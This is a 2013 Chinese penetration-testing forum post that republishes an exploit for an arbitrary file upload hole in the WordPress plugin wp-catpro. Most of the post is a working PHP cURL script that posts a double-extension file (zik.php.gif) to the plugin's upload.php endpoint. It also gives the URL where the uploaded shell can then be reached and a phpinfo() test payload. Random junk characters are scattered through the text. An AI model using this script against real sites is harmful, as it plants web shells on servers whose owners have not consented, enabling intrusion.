找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress插件wp-catpro任意文件上传
返回列表 发新帖
查看: 2607|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability7 T3 \9 _* G1 R9 n7 J
#-----------------------------------------------------------------------0 u5 Q9 b1 O3 b  O* ~  Y) z& ?# i# Z
4 o2 `; v/ q( Z$ g
作者  => Zikou-16
3 a4 g, z9 a5 y. t邮箱 => zikou16x@gmail.com
6 [6 Z7 f/ J% Z( p' I4 e4 k测试系统 : Windows 7 , Backtrack 5r3( b' A0 t- `. L: [8 Z; U! C# L
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip' h, |% f7 Z  b2 d
####
' _; L! i! R6 ]% m
5 F# w% Z7 k5 R4 g8 `0 F#=> Exploit 信息:
  D) {. x1 d$ y+ U8 W6 R+ w------------------8 f: f6 F  j2 E
# 攻击者可以上传 file/shell.php.gif
2 q& P5 @- Z+ m; B, g# ("jpg", "gif", "png")  // Allowed file extensions. r: i% H: R' m+ a
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)$ R+ c( [2 Y) l4 h# G1 k) R8 i$ I
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
2 T5 |" h2 a" u0 P6 Y* Y------------------! f) u: x1 }! `* j1 f- f0 ?

  ^& F6 ~3 ~; d3 l#=> Exploit1 l2 `2 c* e/ }2 b4 p% N0 i
-----------
4 m" y  a* n7 \: c) L5 r  k<?php4 f; g1 u$ C% x; ~& O) {5 e* X# r5 P

, X3 ?% f) u! _# ]6 b+ P1 W& k7 j$uploadfile="zik.php.gif";: X9 q! m: R( i1 \% z/ d* ^
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
# c' j6 O* y  _; X8 U. ?curl_setopt($ch, CURLOPT_POST, true);. Y" \1 S/ x+ V4 a5 n: j1 N# k
curl_setopt($ch, CURLOPT_POSTFIELDS,
# r/ z. \1 G3 Q1 t! j) marray('Filedata'=>"@$uploadfile",! D& {' y1 O" u! S( z+ ]
'folder'=>'/wp-content/uploads/catpro/'));
3 d6 v) x- o7 P* |# Q1 F4 _3 ccurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
. i7 q3 R% P1 E% o$postResult = curl_exec($ch);
& s3 i& Q* K1 K7 ]0 K8 ^( H0 pcurl_close($ch);% K- c3 s. \' r# W
4 z  b  h, y4 y$ b1 i% C: s
print "$postResult";$ J5 a2 Z: \" Z

# y- U' G) V6 m8 p' [' eShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif! W, ]/ L0 F+ a$ ]' o: Z4 X
  ?>
3 F/ K! Y5 ~! C$ w<?php
! I; T5 X& L8 s. q2 w; M7 Z/ _phpinfo();* y( X  n9 Y* d1 K. p8 ~% D
?>
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表